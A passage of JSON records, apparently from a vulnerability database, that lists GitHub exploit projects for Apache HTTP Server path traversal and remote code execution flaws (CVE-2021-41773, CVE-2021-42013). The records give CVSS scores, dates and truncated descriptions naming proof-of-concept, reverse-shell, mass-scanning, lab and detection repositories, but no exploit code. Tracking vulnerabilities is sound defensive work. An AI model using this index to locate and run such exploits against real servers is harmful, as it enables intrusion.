"githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-03-14T01:27:30", "id": "A3F15BCE-08AD-509D-AE63-9D3D8E402E0B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773\n\nA Zeek package which raises notices for Path T...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": 
"HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T06:54:27", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-28T05:48:41", "id": "805E6B24-8DF9-51D8-8DF6-6658161F96EA", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-20T13:22:33", "description": "# Apache (Linux) CVE-2021-41773/2021-42013 Mass Vulnerability Ch...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-09T02:12:39", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013", "CVE-2021-41773"], "modified": "2022-02-20T09:15:02", "id": "8A57FAF6-FC91-52D1-84E0-4CBBAD3F9677", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-19T12:11:27", "description": "# CVE-2021-42013\n\nThis is the deployment for Apache 2.4.50 which...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-25T09:07:00", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-01-05T08:38:27", "id": "68A13FF0-60E5-5A29-9248-83A940B0FB02", "href": "", "cvss": {"score": 7.5, 
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773-Playground\nSome docker images to play with CVE-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-04T22:52:44", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-01-11T09:06:38", "id": "86360765-0B1A-5D73-A805-BAE8F1B5D16D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-28T21:50:54", "description": "# SimplesApachePathTraversal\n\n\n\n<p align=\"center\">\n<a href=\"http...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", 
"userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-13T17:03:56", "type": "githubexploit", "title": "Exploit for Files or Directories Accessible to External Parties in Apache Flink", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013", "CVE-2021-41773", "CVE-2020-17519"], "modified": "2022-02-28T17:25:24", "id": "11813536-2AFF-5EA4-B09F-E9EB340DDD26", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T12:39:42", "description": "# CVE-2021-42013-LAB\nApache HTTP Server 2.4.50 - RCE Lab\n\n\n**exp...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-03T13:26:05", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-02-20T23:15:08", "id": "6A0A657E-8300-5312-99CE-E11F460B1DBF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-09-15T15:24:03", "description": "# Apache 2.4.50 - Path Traversal or Remote Code Execution\ncve-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-15T11:28:39", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-09-15T11:28:51", "id": "CC15AE65-B697-525A-AF4B-38B1501CAB49", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-09-15T15:23:31", "description": "# Apache 2.4.50 - Path Traversal or Remote Code Execution\ncve-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-15T12:15:00", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-09-15T12:15:18", "id": "9B4F4E4A-CFDF-5847-805F-C0BAE809DBD5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-28T15:50:38", "description": "# CVE-2021-42013\nApache 2.4.49-50 Remote Code Ex...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-28T09:21:50", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": 
false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-07-28T09:24:11", "id": "E81474F6-6DDC-5FC2-828A-812A8815E3B4", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-09-15T15:23:57", "description": "# cve-2021-42013\nApache 2.4.50 Path traversal vulnerabi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-15T11:35:00", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-09-15T11:35:00", "id": "E796A40A-8A8E-59D1-93FB-78EF4D8B7FA6", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": 
"2022-05-31T04:56:17", "description": "# CVE-2021-42013\nC implementation of the infamous [Apache 2.4.50...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-31T03:28:20", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-05-31T03:29:22", "id": "61075B23-F713-537A-9B84-7EB9B96CF228", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-10-01T23:13:35", "description": "# CVE-2021-42013\nApache 2.4.49-50 Remote Code Ex...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-28T09:21:50", "type": "githubexploit", "title": "Exploit 
for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-07-28T09:24:11", "id": "4051D2EF-1C43-576D-ADB2-B519B31F93A0", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-27T09:32:53", "description": "# CVE-2021-42013_Reverse-Shell\nPoC CVE-2021-42013 reverse shell ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-24T12:57:55", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2021-42013"], "modified": "2022-03-27T07:43:58", "id": "8713FD59-264B-5FD7-8429-3251AB5AB3B8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-21T12:49:33", "description": "# cve-2021-42013\nApache 2.4.50 Path traversal vulnerab...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T05:44:54", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-07-04T15:27:56", "id": "6BCBA83C-4A4C-58D7-92E4-DF092DFEF267", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-42013 - Apache HTTP Server 2.4.50\n\n# Cara Menjalankan...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 
9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-20T15:32:39", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2021-10-23T13:16:56", "id": "5312D04F-9490-5472-84FA-86B3BBDC8928", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-30T00:48:07", "description": "# CVE-2021-42013\n## Poc CVE-2021-42013 - Apache 2.4.50 withou...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-23T21:58:44", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, 
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-08-29T22:56:33", "id": "22DCCD26-B68C-5905-BAC2-71D10DE3F123", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-11T22:19:41", "description": "# apache-exploit-CVE-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T18:31:29", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-04-09T05:38:40", "id": "2A177215-CE4A-5FA7-B016-EEAF332D165C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-01-31T15:49:09", "description": "# Apache 2.4.50 - Path Traversal or Remote Code Execution\nCVE-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", 
"attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-27T14:29:10", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2023-01-11T03:47:33", "id": "52E13088-9643-5E81-B0A0-B7478BCF1F2C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-28T02:57:15", "description": "# CVE-2021-41773\nPath traversal and file disclosure vulnerabilit...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-06T13:39:57", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, 
